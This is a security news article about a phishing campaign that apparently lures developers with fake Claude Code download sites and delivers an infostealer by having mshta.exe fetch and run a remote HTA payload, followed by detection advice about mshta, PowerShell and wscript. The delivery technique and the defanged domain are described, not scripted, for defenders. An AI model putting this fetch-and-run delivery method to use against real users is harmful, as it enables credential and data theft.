Threat Actors Exploit Interest in Anthropic’s Claude Code with Phishing Campaigns
Recent reports have surfaced revealing that threat actors are capitalizing on the growing interest surrounding Anthropic’s Claude Code tools. They are orchestrating sophisticated phishing campaigns that involve the establishment of counterfeit download portals designed to distribute a lightweight infostealer via the Microsoft HTML Application host, known as mshta.exe.
This alarming scenario underscores how a single living-off-the-land binary (LOLBIN) can effectively serve as the backbone of a data-theft operation, eliminating the need for more complex malware frameworks. The attackers behind this scheme are either registering or hijacking domains that convincingly mimic legitimate download sites for Claude Code. These deceptive domains are then promoted through search engine results, advertisements, and various social media platforms, specifically targeting developers and tech-savvy users eager to utilize Claude Code.
A critical domain that has been identified in this campaign is it[.]com. This site has been employed as a delivery mechanism, hosting a fraudulent installer or download link that falsely claims to offer the authentic Claude Code desktop application. When unsuspecting victims click on the “download” button, they receive either a script-based loader or a shortcut file. These files discreetly hand control over to built-in Windows binaries instead of a legitimate installer, marking the beginning of the attack.
The tactics employed in this campaign bear a striking resemblance to previous incidents where the branding of AI tools, including popular platforms like ChatGPT, has been misused to persuade users into executing unsigned code. In this case, the promise of accessing Claude Code is sufficient to trick users into running potentially harmful scripts. Many of these downloaded files are deceptively small and appear harmless, easily evading scrutiny from vigilant users.
MSHTA as the Delivery Workhorse
Central to the success of this attack is mshta.exe, Microsoft’s HTML Application Host, which has long been exploited by cybercriminals. This LOLBIN can execute HTA files and remote scripts with the same trust level as native Windows components, providing a seamless path for operators to download the infostealer without deploying a traditional executable at the initial stage.
After the victim launches the fake installer, a command is triggered that spawns mshta.exe with a remote URL parameter. This instructs mshta.exe to fetch and execute an HTA payload directly from the compromised domain it[.]com. Remarkably, this entire sequence of events can transpire within a single user session, with the only visible artifact being a fleeting installer window or, in some cases, nothing at all, depending on how the lure is crafted.
The Significance of Simple LOLBins
This incident serves as a crucial reminder that defenders in the cybersecurity landscape cannot afford to consider alerts triggered by mshta.exe as mere background noise or low-priority alerts. Security teams have consistently found that a single suspicious instance of mshta.exe—particularly one connecting to an external domain—can be the first and only indication of a multi-stage infostealer operation.
Even if endpoint protection mechanisms manage to block the ultimate payload, the initial invocation of mshta.exe can yield valuable indicators of compromise, which are crucial for comprehensive threat hunting and operational containment.
Moreover, not every significant detection hinges on sophisticated machine-learning models or extensive sandboxing techniques. Security professionals can often uncover genuine attacker behavior by closely monitoring a handful of LOLBins, such as mshta.exe, powershell.exe, and wscript.exe.
For defenders, tuning detection systems to respond to remote HTA execution attempts, unexpected parent processes for mshta.exe, and outbound connections to newly observed domains such as it[.]com can provide powerful, low-noise signals that aid in identifying ongoing threat campaigns.
In conclusion, as the digital landscape becomes increasingly dynamic, the tactics employed by cybercriminals continue to evolve. Therefore, vigilant monitoring and responsive security measures are essential in thwarting these deceptive campaigns, especially those that exploit the interest in cutting-edge technology like Anthropic’s Claude Code. It is imperative for organizations and security teams to remain proactive in their defense strategies to protect against these ever-present threats.